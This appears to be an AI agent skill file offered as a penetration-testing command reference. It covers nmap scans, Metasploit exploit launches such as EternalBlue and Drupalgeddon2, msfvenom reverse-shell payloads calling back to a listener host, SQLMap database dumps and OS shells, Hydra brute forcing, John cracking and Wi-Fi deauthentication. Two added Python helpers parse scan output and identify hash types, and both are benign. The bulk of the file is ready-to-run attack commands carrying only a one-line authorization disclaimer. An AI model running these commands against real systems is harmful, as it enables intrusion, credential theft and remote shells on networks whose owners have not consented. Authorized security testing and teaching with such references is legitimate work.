| Field | Value |
|---|---|
| name | pentest-commands |
| description | Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments. |
| risk | offensive |
| source | community |
| author | zebbern |
| date_added | 2026-02-27 |
AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.
# Pentest Commands

## Purpose

Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
## Inputs/Prerequisites
- Kali Linux or penetration testing distribution
- Target IP addresses with authorization
- Wordlists for brute forcing
- Network access to target systems
- Basic understanding of tool syntax
## Outputs/Deliverables
- Network enumeration results
- Identified vulnerabilities
- Exploitation payloads
- Cracked credentials
- Web vulnerability findings
## Core Workflow

### 1. Nmap Commands

**Host Discovery:**

```bash
nmap -sP 192.168.1.0/24   # legacy alias of -sn (ping sweep)
nmap -sL 192.168.1.0/24   # list scan: resolve names only, send no probes
nmap -sn 192.168.1.0/24   # ping sweep, no port scan
```

**Port Scanning:**

```bash
nmap -sS 192.168.1.1              # TCP SYN (half-open) scan
nmap -sT 192.168.1.1              # TCP connect scan
nmap -sU 192.168.1.1              # UDP scan
nmap -p- 192.168.1.1              # all 65535 TCP ports
nmap -p 22,80,443 192.168.1.1     # selected ports
```

**Service Detection:**

```bash
nmap -sV 192.168.1.1    # service/version detection
nmap -O 192.168.1.1     # OS detection
nmap -A 192.168.1.1     # -sV, -O, default scripts and traceroute
nmap -Pn 192.168.1.1    # skip host discovery, treat host as up
```

**NSE Scripts:**

```bash
nmap --script vuln 192.168.1.1
nmap --script smb-enum-shares -p 445 192.168.1.1
nmap --script http-enum -p 80 192.168.1.1
nmap --script smb-vuln-ms17-010 192.168.1.1
nmap --script smb-vuln-ms08-067 192.168.1.1
nmap --script ssh-brute -p 22 192.168.1.1
nmap --script ftp-anon 192.168.1.1
nmap --script dns-brute 192.168.1.1
nmap -p80 --script http-methods 192.168.1.1
nmap -p80 --script http-headers 192.168.1.1
nmap --script http-sql-injection -p 80 192.168.1.1
```

**Advanced Scans:**

```bash
nmap -sX 192.168.1.1            # Xmas scan (FIN, PSH, URG)
nmap -sA 192.168.1.1            # ACK scan, maps firewall rules
nmap -sW 192.168.1.1            # TCP window scan
nmap --traceroute 192.168.1.1
```
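To turn the scans above into the "Network enumeration results" deliverable, the following added example (not part of the original skill) parses nmap's XML output, produced with the `-oX` flag, into a per-host inventory and flags open services that are not on an expected-services allowlist, which is how a defender would compare a scan against the asset baseline. The XML sample is constructed, and the allowlist contents are an assumption.

```python
"""Parse nmap XML output (-oX) into a host/port inventory and diff it
against an allowlist of expected services. Added example; not from the
original skill."""
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output (not captured from a real scan).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.168.1.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.1.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="nginx"/></port>
      <port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.1.2" addrtype="ipv4"/>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.1.3" addrtype="ipv4"/>
    <address addr="AA:BB:CC:DD:EE:FF" addrtype="mac"/>
    <ports>
      <port protocol="udp" portid="161"><state state="open" reason="udp-response"/><service name="snmp"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: [(proto, port, state, banner), ...]} for hosts that are up.

    Hosts reported as down are skipped; the IPv4/IPv6 address is used as the
    key even when a MAC address element is also present."""
    root = ET.fromstring(xml_text)
    inventory = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = next((a.get("addr") for a in host.findall("address")
                   if a.get("addrtype") in ("ipv4", "ipv6")), None)
        if ip is None:
            continue
        entries = []
        for port in host.findall("ports/port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            banner = ""
            if svc is not None:
                # Join whatever -sV managed to identify: name, product, version.
                banner = " ".join(p for p in (svc.get("name"), svc.get("product"),
                                              svc.get("version")) if p)
            entries.append((port.get("protocol"), int(port.get("portid")), state, banner))
        inventory[ip] = entries
    return inventory


def open_services(inventory):
    """Flatten the inventory to sorted (ip, proto, port, banner) tuples for open ports."""
    return sorted((ip, proto, port, banner)
                  for ip, ports in inventory.items()
                  for proto, port, state, banner in ports
                  if state == "open")


def unexpected_services(inventory, allowlist):
    """Open services whose (ip, proto, port) is not in the expected-services allowlist."""
    return [s for s in open_services(inventory) if (s[0], s[1], s[2]) not in allowlist]


if __name__ == "__main__":
    # Assumed baseline: only SSH and HTTP on the gateway are expected.
    expected = {("192.168.1.1", "tcp", 22), ("192.168.1.1", "tcp", 80)}
    inv = parse_nmap_xml(SAMPLE_XML)
    for entry in open_services(inv):
        print("open:      ", entry)
    for entry in unexpected_services(inv, expected):
        print("unexpected:", entry)
```

Run it against a real scan with `python3 inventory.py` after replacing `SAMPLE_XML` with the contents of the `-oX` file; the filtered port 445 is kept in the inventory but excluded from the open-service list, so the allowlist diff only reports services a client could actually reach.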
### 2. Metasploit Commands

**Basic Usage:**

```bash
msfconsole
search type:exploit name:smb
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOST 192.168.1.1       # RHOST is accepted as an alias of RHOSTS in current versions
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
```

**Common Exploits:**

```bash
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
```

**Scanners:**

```bash
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
```

**Handler Setup:**

```bash
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
```

**Payload Generation (msfvenom):**

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
```
### 3. Nikto Commands

```bash
nikto -h http://192.168.1.1
nikto -h http://192.168.1.1 -C all                 # check all CGI directories
nikto -h http://192.168.1.1 -output report.html
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl
nikto -h http://192.168.1.1 -Format msf+           # output importable into Metasploit
nikto -h http://192.168.1.1 -Tuning 1              # tuning 1: interesting files only
```
### 4. SQLMap Commands

```bash
sqlmap -u "http://192.168.1.1/page?id=1"
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"   # POST parameters
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"                  # * marks the injection point
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
```
### 5. Hydra Commands

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"   # path:body:failure string
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
hydra -l admin -P passwords.txt smb://192.168.1.1
hydra -l admin -P passwords.txt rdp://192.168.1.1
hydra -l root -P passwords.txt mysql://192.168.1.1
hydra -L users.txt -P passwords.txt ssh://192.168.1.1   # -L: username list, -l: single username
```
### 6. John the Ripper Commands

```bash
john hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --show                     # print already-cracked results from john.pot
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt
ssh2john id_rsa > ssh_hash.txt           # convert an encrypted private key to john format
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
zip2john file.zip > zip_hash.txt
john zip_hash.txt
```
### 7. Aircrack-ng Commands

```bash
airmon-ng start wlan0                                              # put the interface into monitor mode
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon      # capture channel 6 for one BSSID
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
```
### 8. Wireshark/Tshark Commands

```bash
tshark -i eth0 -w capture.pcap                                    # capture to file
tshark -r capture.pcap                                            # read a capture
tshark -r capture.pcap -Y "http"                                  # display filter
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri    # print one field per packet
```
## Quick Reference

### Common Port Scans

```bash
nmap -F 192.168.1.1                  # fast scan: 100 most common ports
nmap -sV -sC -A -p- 192.168.1.1      # full port range with versions and default scripts
nmap -sV -T4 192.168.1.1             # version detection, aggressive timing
```
### Password Hash Types

| Hashcat mode | Hash type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 13100 | Kerberoast (Kerberos 5 TGS-REP etype 23) |
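As an added example (not from the original skill), the following Python maps a hash string to the candidate hashcat modes in the table above and to the matching John `--format` name, using the standard format prefixes (`$6$`, `$2b$`, `$krb5tgs$23$`). Raw MD5 and NTLM are both 32 hex characters, so the identifier reports both candidates instead of guessing; the sample hashes in the usage section are constructed.

```python
"""Identify candidate hashcat modes / John formats from a hash string's shape.
Added example; not part of the original skill."""
import re

HEX_ONLY = re.compile(r"^[0-9a-fA-F]+$")
BCRYPT = re.compile(r"^\$2[abxy]\$\d{2}\$")   # $2b$<cost>$<salt+hash>

# hashcat mode -> John the Ripper --format name (jumbo build names)
MODE_TO_JOHN = {
    0: "raw-md5",
    100: "raw-sha1",
    1000: "nt",
    1800: "sha512crypt",
    3200: "bcrypt",
    13100: "krb5tgs",
}


def hashcat_modes(h):
    """Return candidate hashcat mode numbers for hash string h.

    Ambiguous shapes (32 hex chars) return more than one candidate;
    unrecognised input returns an empty list so callers cannot silently
    pick a wrong mode."""
    h = h.strip()
    if h.startswith("$6$"):
        return [1800]          # sha512crypt: $6$[rounds=N$]salt$hash
    if BCRYPT.match(h):
        return [3200]          # bcrypt: $2a$/$2b$/$2y$ cost salt+hash
    if h.startswith("$krb5tgs$23$"):
        return [13100]         # Kerberos 5 TGS-REP etype 23 (RC4), i.e. Kerberoast
    if HEX_ONLY.match(h):
        if len(h) == 32:
            return [0, 1000]   # raw MD5 and NTLM are indistinguishable by shape
        if len(h) == 40:
            return [100]       # raw SHA1
    return []


def john_format(mode):
    """John --format name for a hashcat mode from the table, or None if unlisted."""
    return MODE_TO_JOHN.get(mode)


def classify_lines(lines):
    """Classify 'hash' or 'user:hash' lines as found in a hash file.
    Returns [(original_line, candidate_modes)], skipping blank lines."""
    out = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        # Prefixed formats contain ':' only inside the hash, so split on the
        # first ':' only when the remainder does not start with '$'.
        hash_part = line
        if ":" in line and not line.startswith("$"):
            hash_part = line.split(":", 1)[1]
        out.append((line, hashcat_modes(hash_part)))
    return out


if __name__ == "__main__":
    # Constructed sample lines, not real credentials.
    sample = [
        "alice:5f4dcc3b5aa765d61d8327deb882cf99",
        "$6$saltsalt$" + "A" * 86,
        "$2b$12$" + "B" * 53,
        "not-a-hash",
    ]
    for line, modes in classify_lines(sample):
        names = [john_format(m) for m in modes]
        print(f"{line[:40]:40} hashcat={modes} john={names}")
```

When the identifier returns two candidates, run both modes (or both `--format` values) rather than assuming; a plaintext that cracks under the wrong mode is a coincidence, not a result.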
## Constraints
- Always have written authorization
- Some scans are noisy and detectable
- Brute forcing may lock accounts
- Rate limiting on the target slows or blocks brute-force and scanning tools
## Examples

**Example 1: Quick Vulnerability Scan**

```bash
nmap -sV --script vuln 192.168.1.1
```

**Example 2: Web App Test**

```bash
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
```
## Troubleshooting

| Issue | Solution |
|---|---|
| Scan too slow | Increase timing (-T4, -T5) |
| Ports filtered | Try different scan types |
| Exploit fails | Check target version compatibility |
| Passwords not cracking | Try larger wordlists, rules |
## When to Use

Use this skill when carrying out the workflow or actions described in the sections above.